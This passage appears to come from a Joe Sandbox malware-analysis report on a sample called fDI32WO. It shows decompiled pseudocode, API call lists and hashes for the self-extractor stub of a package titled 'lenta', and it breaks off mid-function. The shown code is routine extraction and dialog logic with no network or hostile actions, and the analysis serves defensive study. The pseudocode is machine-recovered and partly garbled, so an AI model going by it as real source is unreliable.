                                                                                                                                                                                                                                              • EndDialog.USER32(?,00000000), ref: 00A8343F
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
                                                                                                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$lenta
                                                                                                                                                                                                                                              • API String ID: 2418873061-2011945725
                                                                                                                                                                                                                                              • Opcode ID: 265353d9d4438c29ca1c51b797041c65761740d8fdd5a8ffcfd407fd33065cc3
                                                                                                                                                                                                                                              • Instruction ID: 4b07df64b3d4c2a5bcc2d19a7e21829b07503a8c2ec1eeceff3a07d298d5b941
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 265353d9d4438c29ca1c51b797041c65761740d8fdd5a8ffcfd407fd33065cc3
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DC5157323412417BFF21BB759C8CFBB2E5CEB56F55F104229F6029A0D0DAA88A039361
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 93%
                                                                                                                                                                                                                                              			E00A82CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v268;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t13;
                                                                                                                                                                                                                                              				void* _t20;
                                                                                                                                                                                                                                              				void* _t23;
                                                                                                                                                                                                                                              				void* _t27;
                                                                                                                                                                                                                                              				struct HRSRC__* _t31;
                                                                                                                                                                                                                                              				intOrPtr _t33;
                                                                                                                                                                                                                                              				void* _t43;
                                                                                                                                                                                                                                              				void* _t48;
                                                                                                                                                                                                                                              				signed int _t65;
                                                                                                                                                                                                                                              				struct HINSTANCE__* _t66;
                                                                                                                                                                                                                                              				signed int _t67;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t13 =  *0xa88004; // 0xd891196d
                                                                                                                                                                                                                                              				_v8 = _t13 ^ _t67;
                                                                                                                                                                                                                                              				_t65 = 0;
                                                                                                                                                                                                                                              				_t66 = __ecx;
                                                                                                                                                                                                                                              				_t48 = __edx;
                                                                                                                                                                                                                                              				 *0xa89a3c = __ecx;
                                                                                                                                                                                                                                              				memset(0xa89140, 0, 0x8fc);
                                                                                                                                                                                                                                              				memset(0xa88a20, 0, 0x32c);
                                                                                                                                                                                                                                              				memset(0xa888c0, 0, 0x104);
                                                                                                                                                                                                                                              				 *0xa893ec = 1;
                                                                                                                                                                                                                                              				_t20 = E00A8468F("TITLE", 0xa89154, 0x7f);
                                                                                                                                                                                                                                              				if(_t20 == 0 || _t20 > 0x80) {
                                                                                                                                                                                                                                              					_t64 = 0x4b1;
                                                                                                                                                                                                                                              					goto L32;
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					_t27 = CreateEventA(0, 1, 1, 0);
                                                                                                                                                                                                                                              					 *0xa8858c = _t27;
                                                                                                                                                                                                                                              					SetEvent(_t27);
                                                                                                                                                                                                                                              					_t64 = 0xa89a34;
                                                                                                                                                                                                                                              					if(E00A8468F("EXTRACTOPT", 0xa89a34, 4) != 0) {
                                                                                                                                                                                                                                              						if(( *0xa89a34 & 0x000000c0) == 0) {
                                                                                                                                                                                                                                              							L12:
                                                                                                                                                                                                                                              							 *0xa89120 =  *0xa89120 & _t65;
                                                                                                                                                                                                                                              							if(E00A85C9E(_t48, _t48, _t65, _t66) != 0) {
                                                                                                                                                                                                                                              								if( *0xa88a3a == 0) {
                                                                                                                                                                                                                                              									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
                                                                                                                                                                                                                                              									if(_t31 != 0) {
                                                                                                                                                                                                                                              										_t65 = LoadResource(_t66, _t31);
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              									if( *0xa88184 != 0) {
                                                                                                                                                                                                                                              										__imp__#17();
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              									if( *0xa88a24 == 0) {
                                                                                                                                                                                                                                              										_t57 = _t65;
                                                                                                                                                                                                                                              										if(E00A836EE(_t65) == 0) {
                                                                                                                                                                                                                                              											goto L33;
                                                                                                                                                                                                                                              										} else {
                                                                                                                                                                                                                                              											_t33 =  *0xa89a40; // 0x3
                                                                                                                                                                                                                                              											_t48 = 1;
                                                                                                                                                                                                                                              											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
                                                                                                                                                                                                                                              												if(( *0xa89a34 & 0x00000100) == 0 || ( *0xa88a38 & 0x00000001) != 0 || E00A818A3(_t64, _t66) != 0) {
                                                                                                                                                                                                                                              													goto L30;
                                                                                                                                                                                                                                              												} else {
                                                                                                                                                                                                                                              													_t64 = 0x7d6;
                                                                                                                                                                                                                                              													if(E00A86517(_t57, 0x7d6, _t34, E00A819E0, 0x547, 0x83e) != 0x83d) {
                                                                                                                                                                                                                                              														goto L33;
                                                                                                                                                                                                                                              													} else {
                                                                                                                                                                                                                                              														goto L30;
                                                                                                                                                                                                                                              													}
                                                                                                                                                                                                                                              												}
                                                                                                                                                                                                                                              											} else {
                                                                                                                                                                                                                                              												L30:
                                                                                                                                                                                                                                              												_t23 = _t48;
                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              									} else {
                                                                                                                                                                                                                                              										_t23 = 1;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                                                              									E00A82390(0xa88a3a);
                                                                                                                                                                                                                                              									goto L33;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                                                              								_t64 = 0x520;
                                                                                                                                                                                                                                              								L32:
                                                                                                                                                                                                                                              								E00A844B9(0, _t64, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              								goto L33;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							_t64 =  &_v268;
                                                                                                                                                                                                                                              							if(E00A8468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
                                                                                                                                                                                                                                              								goto L3;
                                                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                                                              								_t43 = CreateMutexA(0, 1,  &_v268);
                                                                                                                                                                                                                                              								 *0xa88588 = _t43;
                                                                                                                                                                                                                                              								if(_t43 == 0 || GetLastError() != 0xb7) {
                                                                                                                                                                                                                                              									goto L12;
                                                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                                                              									if(( *0xa89a34 & 0x00000080) == 0) {
                                                                                                                                                                                                                                              										_t64 = 0x524;
                                                                                                                                                                                                                                              										if(E00A844B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
                                                                                                                                                                                                                                              											goto L12;
                                                                                                                                                                                                                                              										} else {
                                                                                                                                                                                                                                              											goto L11;
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              									} else {
                                                                                                                                                                                                                                              										_t64 = 0x54b;
                                                                                                                                                                                                                                              										E00A844B9(0, 0x54b, "lenta", 0, 0x10, 0);
                                                                                                                                                                                                                                              										L11:
                                                                                                                                                                                                                                              										CloseHandle( *0xa88588);
                                                                                                                                                                                                                                              										 *0xa89124 = 0x800700b7;
                                                                                                                                                                                                                                              										goto L33;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						L3:
                                                                                                                                                                                                                                              						_t64 = 0x4b1;
                                                                                                                                                                                                                                              						E00A844B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              						 *0xa89124 = 0x80070714;
                                                                                                                                                                                                                                              						L33:
                                                                                                                                                                                                                                              						_t23 = 0;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return E00A86CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
                                                                                                                                                                                                                                              			}



















                                                                                                                                                                                                                                              0x00a82cb5
                                                                                                                                                                                                                                              0x00a82cbc
                                                                                                                                                                                                                                              0x00a82cc7
                                                                                                                                                                                                                                              0x00a82cc9
                                                                                                                                                                                                                                              0x00a82cd1
                                                                                                                                                                                                                                              0x00a82cd3
                                                                                                                                                                                                                                              0x00a82cd9
                                                                                                                                                                                                                                              0x00a82ce9
                                                                                                                                                                                                                                              0x00a82cf9
                                                                                                                                                                                                                                              0x00a82d0e
                                                                                                                                                                                                                                              0x00a82d15
                                                                                                                                                                                                                                              0x00a82d1c
                                                                                                                                                                                                                                              0x00a82ef3
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a82d2d
                                                                                                                                                                                                                                              0x00a82d34
                                                                                                                                                                                                                                              0x00a82d3b
                                                                                                                                                                                                                                              0x00a82d40
                                                                                                                                                                                                                                              0x00a82d48
                                                                                                                                                                                                                                              0x00a82d59
                                                                                                                                                                                                                                              0x00a82d84
                                                                                                                                                                                                                                              0x00a82e1f
                                                                                                                                                                                                                                              0x00a82e1f
                                                                                                                                                                                                                                              0x00a82e2e
                                                                                                                                                                                                                                              0x00a82e41
                                                                                                                                                                                                                                              0x00a82e5a
                                                                                                                                                                                                                                              0x00a82e62
                                                                                                                                                                                                                                              0x00a82e6c
                                                                                                                                                                                                                                              0x00a82e6c
                                                                                                                                                                                                                                              0x00a82e75
                                                                                                                                                                                                                                              0x00a82e77
                                                                                                                                                                                                                                              0x00a82e77
                                                                                                                                                                                                                                              0x00a82e84
                                                                                                                                                                                                                                              0x00a82e8b
                                                                                                                                                                                                                                              0x00a82e94
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a82e96
                                                                                                                                                                                                                                              0x00a82e96
                                                                                                                                                                                                                                              0x00a82e9e
                                                                                                                                                                                                                                              0x00a82ea2
                                                                                                                                                                                                                                              0x00a82eba
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a82ece
                                                                                                                                                                                                                                              0x00a82ede
                                                                                                                                                                                                                                              0x00a82eed
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a82eed
                                                                                                                                                                                                                                              0x00a82eef
                                                                                                                                                                                                                                              0x00a82eef
                                                                                                                                                                                                                                              0x00a82eef
                                                                                                                                                                                                                                              0x00a82eef
                                                                                                                                                                                                                                              0x00a82ea2
                                                                                                                                                                                                                                              0x00a82e86
                                                                                                                                                                                                                                              0x00a82e88
                                                                                                                                                                                                                                              0x00a82e88
                                                                                                                                                                                                                                              0x00a82e43
                                                                                                                                                                                                                                              0x00a82e48
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a82e48
                                                                                                                                                                                                                                              0x00a82e30
                                                                                                                                                                                                                                              0x00a82e30
                                                                                                                                                                                                                                              0x00a82ef8
                                                                                                                                                                                                                                              0x00a82f01
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a82f01
                                                                                                                                                                                                                                              0x00a82d8a
                                                                                                                                                                                                                                              0x00a82d8f
                                                                                                                                                                                                                                              0x00a82da1
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a82da3
                                                                                                                                                                                                                                              0x00a82dae
                                                                                                                                                                                                                                              0x00a82db4
                                                                                                                                                                                                                                              0x00a82dbb
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a82dca
                                                                                                                                                                                                                                              0x00a82dd3
                                                                                                                                                                                                                                              0x00a82df5
                                                                                                                                                                                                                                              0x00a82e02
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a82dd5
                                                                                                                                                                                                                                              0x00a82dde
                                                                                                                                                                                                                                              0x00a82de3
                                                                                                                                                                                                                                              0x00a82e04
                                                                                                                                                                                                                                              0x00a82e0a
                                                                                                                                                                                                                                              0x00a82e10
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a82e10
                                                                                                                                                                                                                                              0x00a82dd3
                                                                                                                                                                                                                                              0x00a82dbb
                                                                                                                                                                                                                                              0x00a82da1
                                                                                                                                                                                                                                              0x00a82d5b
                                                                                                                                                                                                                                              0x00a82d5b
                                                                                                                                                                                                                                              0x00a82d5d
                                                                                                                                                                                                                                              0x00a82d69
                                                                                                                                                                                                                                              0x00a82d6e
                                                                                                                                                                                                                                              0x00a82f06
                                                                                                                                                                                                                                              0x00a82f06
                                                                                                                                                                                                                                              0x00a82f06
                                                                                                                                                                                                                                              0x00a82d59
                                                                                                                                                                                                                                              0x00a82f18

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • memset.MSVCRT ref: 00A82CD9
                                                                                                                                                                                                                                              • memset.MSVCRT ref: 00A82CE9
                                                                                                                                                                                                                                              • memset.MSVCRT ref: 00A82CF9
                                                                                                                                                                                                                                                • Part of subcall function 00A8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A846A0
                                                                                                                                                                                                                                                • Part of subcall function 00A8468F: SizeofResource.KERNEL32(00000000,00000000,?,00A82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A846A9
                                                                                                                                                                                                                                                • Part of subcall function 00A8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A846C3
                                                                                                                                                                                                                                                • Part of subcall function 00A8468F: LoadResource.KERNEL32(00000000,00000000,?,00A82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A846CC
                                                                                                                                                                                                                                                • Part of subcall function 00A8468F: LockResource.KERNEL32(00000000,?,00A82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A846D3
                                                                                                                                                                                                                                                • Part of subcall function 00A8468F: memcpy_s.MSVCRT ref: 00A846E5
                                                                                                                                                                                                                                                • Part of subcall function 00A8468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A846EF
                                                                                                                                                                                                                                              • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A82D34
                                                                                                                                                                                                                                              • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 00A82D40
                                                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00A82DAE
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 00A82DBD
                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(lenta,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00A82E0A
                                                                                                                                                                                                                                                • Part of subcall function 00A844B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A84518
                                                                                                                                                                                                                                                • Part of subcall function 00A844B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00A84554
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
                                                                                                                                                                                                                                              • String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$lenta
                                                                                                                                                                                                                                              • API String ID: 1002816675-2993962200
                                                                                                                                                                                                                                              • Opcode ID: 3c9070369882336c3868a1800679091b8048ddc6298718b7c67a875ac131b198
                                                                                                                                                                                                                                              • Instruction ID: 31631e808faf18df963a440d68a05ce33fd2d283c1a7c16a5a5ac2c6b8966110
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3c9070369882336c3868a1800679091b8048ddc6298718b7c67a875ac131b198
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3851D0706403016BE764FBA09D4ABBB3AA9EB45740F44403AFA82D61D1EFB88C53C725
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 81%
                                                                                                                                                                                                                                              			E00A834F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                                                                                                                                                                                              				void* _t9;
                                                                                                                                                                                                                                              				void* _t12;
                                                                                                                                                                                                                                              				void* _t13;
                                                                                                                                                                                                                                              				void* _t17;
                                                                                                                                                                                                                                              				void* _t23;
                                                                                                                                                                                                                                              				void* _t25;
                                                                                                                                                                                                                                              				struct HWND__* _t35;
                                                                                                                                                                                                                                              				struct HWND__* _t38;
                                                                                                                                                                                                                                              				void* _t39;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t9 = _a8 - 0x10;
                                                                                                                                                                                                                                              				if(_t9 == 0) {
                                                                                                                                                                                                                                              					__eflags = 1;
                                                                                                                                                                                                                                              					L19:
                                                                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                                                                              					 *0xa891d8 = 1;
                                                                                                                                                                                                                                              					L20:
                                                                                                                                                                                                                                              					_push(_a4);
                                                                                                                                                                                                                                              					L21:
                                                                                                                                                                                                                                              					EndDialog();
                                                                                                                                                                                                                                              					L22:
                                                                                                                                                                                                                                              					return 1;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_push(1);
                                                                                                                                                                                                                                              				_pop(1);
                                                                                                                                                                                                                                              				_t12 = _t9 - 0xf2;
                                                                                                                                                                                                                                              				if(_t12 == 0) {
                                                                                                                                                                                                                                              					__eflags = _a12 - 0x1b;
                                                                                                                                                                                                                                              					if(_a12 != 0x1b) {
                                                                                                                                                                                                                                              						goto L22;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					goto L19;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t13 = _t12 - 0xe;
                                                                                                                                                                                                                                              				if(_t13 == 0) {
                                                                                                                                                                                                                                              					_t35 = _a4;
                                                                                                                                                                                                                                              					 *0xa88584 = _t35;
                                                                                                                                                                                                                                              					E00A843D0(_t35, GetDesktopWindow());
                                                                                                                                                                                                                                              					__eflags =  *0xa88184; // 0x1
                                                                                                                                                                                                                                              					if(__eflags != 0) {
                                                                                                                                                                                                                                              						SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
                                                                                                                                                                                                                                              						SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					SetWindowTextA(_t35, "lenta");
                                                                                                                                                                                                                                              					_t17 = CreateThread(0, 0, E00A84FE0, 0, 0, 0xa88798);
                                                                                                                                                                                                                                              					 *0xa8879c = _t17;
                                                                                                                                                                                                                                              					__eflags = _t17;
                                                                                                                                                                                                                                              					if(_t17 != 0) {
                                                                                                                                                                                                                                              						goto L22;
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						E00A844B9(_t35, 0x4b8, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              						_push(0);
                                                                                                                                                                                                                                              						_push(_t35);
                                                                                                                                                                                                                                              						goto L21;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t23 = _t13 - 1;
                                                                                                                                                                                                                                              				if(_t23 == 0) {
                                                                                                                                                                                                                                              					__eflags = _a12 - 2;
                                                                                                                                                                                                                                              					if(_a12 != 2) {
                                                                                                                                                                                                                                              						goto L22;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					ResetEvent( *0xa8858c);
                                                                                                                                                                                                                                              					_t38 =  *0xa88584; // 0x0
                                                                                                                                                                                                                                              					_t25 = E00A844B9(_t38, 0x4b2, 0xa81140, 0, 0x20, 4);
                                                                                                                                                                                                                                              					__eflags = _t25 - 6;
                                                                                                                                                                                                                                              					if(_t25 == 6) {
                                                                                                                                                                                                                                              						L11:
                                                                                                                                                                                                                                              						 *0xa891d8 = 1;
                                                                                                                                                                                                                                              						SetEvent( *0xa8858c);
                                                                                                                                                                                                                                              						_t39 =  *0xa8879c; // 0x0
                                                                                                                                                                                                                                              						E00A83680(_t39);
                                                                                                                                                                                                                                              						_push(0);
                                                                                                                                                                                                                                              						goto L20;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					__eflags = _t25 - 1;
                                                                                                                                                                                                                                              					if(_t25 == 1) {
                                                                                                                                                                                                                                              						goto L11;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					SetEvent( *0xa8858c);
                                                                                                                                                                                                                                              					goto L22;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				if(_t23 == 0xe90) {
                                                                                                                                                                                                                                              					TerminateThread( *0xa8879c, 0);
                                                                                                                                                                                                                                              					EndDialog(_a4, _a12);
                                                                                                                                                                                                                                              					return 1;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return 0;
                                                                                                                                                                                                                                              			}












                                                                                                                                                                                                                                              0x00a834fb
                                                                                                                                                                                                                                              0x00a834fe
                                                                                                                                                                                                                                              0x00a83665
                                                                                                                                                                                                                                              0x00a83666
                                                                                                                                                                                                                                              0x00a83666
                                                                                                                                                                                                                                              0x00a83668
                                                                                                                                                                                                                                              0x00a8366e
                                                                                                                                                                                                                                              0x00a8366e
                                                                                                                                                                                                                                              0x00a83671
                                                                                                                                                                                                                                              0x00a83671
                                                                                                                                                                                                                                              0x00a83677
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a83677
                                                                                                                                                                                                                                              0x00a83504
                                                                                                                                                                                                                                              0x00a83506
                                                                                                                                                                                                                                              0x00a83507
                                                                                                                                                                                                                                              0x00a8350c
                                                                                                                                                                                                                                              0x00a8365b
                                                                                                                                                                                                                                              0x00a8365f
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a83661
                                                                                                                                                                                                                                              0x00a83512
                                                                                                                                                                                                                                              0x00a83515
                                                                                                                                                                                                                                              0x00a835be
                                                                                                                                                                                                                                              0x00a835c1
                                                                                                                                                                                                                                              0x00a835d1
                                                                                                                                                                                                                                              0x00a835d8
                                                                                                                                                                                                                                              0x00a835de
                                                                                                                                                                                                                                              0x00a835f8
                                                                                                                                                                                                                                              0x00a83617
                                                                                                                                                                                                                                              0x00a83617
                                                                                                                                                                                                                                              0x00a83623
                                                                                                                                                                                                                                              0x00a83637
                                                                                                                                                                                                                                              0x00a8363d
                                                                                                                                                                                                                                              0x00a83642
                                                                                                                                                                                                                                              0x00a83644
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a83646
                                                                                                                                                                                                                                              0x00a83652
                                                                                                                                                                                                                                              0x00a83657
                                                                                                                                                                                                                                              0x00a83658
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a83658
                                                                                                                                                                                                                                              0x00a83644
                                                                                                                                                                                                                                              0x00a8351b
                                                                                                                                                                                                                                              0x00a8351d
                                                                                                                                                                                                                                              0x00a8354f
                                                                                                                                                                                                                                              0x00a83553
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a8355f
                                                                                                                                                                                                                                              0x00a83565
                                                                                                                                                                                                                                              0x00a8357c
                                                                                                                                                                                                                                              0x00a83581
                                                                                                                                                                                                                                              0x00a83584
                                                                                                                                                                                                                                              0x00a8359b
                                                                                                                                                                                                                                              0x00a835a1
                                                                                                                                                                                                                                              0x00a835a7
                                                                                                                                                                                                                                              0x00a835ad
                                                                                                                                                                                                                                              0x00a835b3
                                                                                                                                                                                                                                              0x00a835b8
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a835b8
                                                                                                                                                                                                                                              0x00a83586
                                                                                                                                                                                                                                              0x00a83588
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a83590
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a83590
                                                                                                                                                                                                                                              0x00a83524
                                                                                                                                                                                                                                              0x00a83535
                                                                                                                                                                                                                                              0x00a83541
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a83549
                                                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • TerminateThread.KERNEL32(00000000), ref: 00A83535
                                                                                                                                                                                                                                              • EndDialog.USER32(?,?), ref: 00A83541
                                                                                                                                                                                                                                              • ResetEvent.KERNEL32 ref: 00A8355F
                                                                                                                                                                                                                                              • SetEvent.KERNEL32(00A81140,00000000,00000020,00000004), ref: 00A83590
                                                                                                                                                                                                                                              • GetDesktopWindow.USER32 ref: 00A835C7
                                                                                                                                                                                                                                              • GetDlgItem.USER32(?,0000083B), ref: 00A835F1
                                                                                                                                                                                                                                              • SendMessageA.USER32(00000000), ref: 00A835F8
                                                                                                                                                                                                                                              • GetDlgItem.USER32(?,0000083B), ref: 00A83610
                                                                                                                                                                                                                                              • SendMessageA.USER32(00000000), ref: 00A83617
                                                                                                                                                                                                                                              • SetWindowTextA.USER32(?,lenta), ref: 00A83623
                                                                                                                                                                                                                                              • CreateThread.KERNEL32 ref: 00A83637
                                                                                                                                                                                                                                              • EndDialog.USER32(?,00000000), ref: 00A83671
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
                                                                                                                                                                                                                                              • String ID: lenta
                                                                                                                                                                                                                                              • API String ID: 2406144884-2780258678
                                                                                                                                                                                                                                              • Opcode ID: 101173ce9f52f892a00eafc4eedf9cae084ab0b074bf6938b85ffe0e9a78a076
                                                                                                                                                                                                                                              • Instruction ID: a3332457d42cda8a5f1da406526578647cca80af7266d36a60481bb873ecd918
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 101173ce9f52f892a00eafc4eedf9cae084ab0b074bf6938b85ffe0e9a78a076
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AC31B932240301BBEB20BFA9EC4DE2B3A75F795F11F544626F602952B0EF798912CB51
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 50%
                                                                                                                                                                                                                                              			E00A84224(char __ecx) {
                                                                                                                                                                                                                                              				char* _v8;
                                                                                                                                                                                                                                              				_Unknown_base(*)()* _v12;
                                                                                                                                                                                                                                              				_Unknown_base(*)()* _v16;
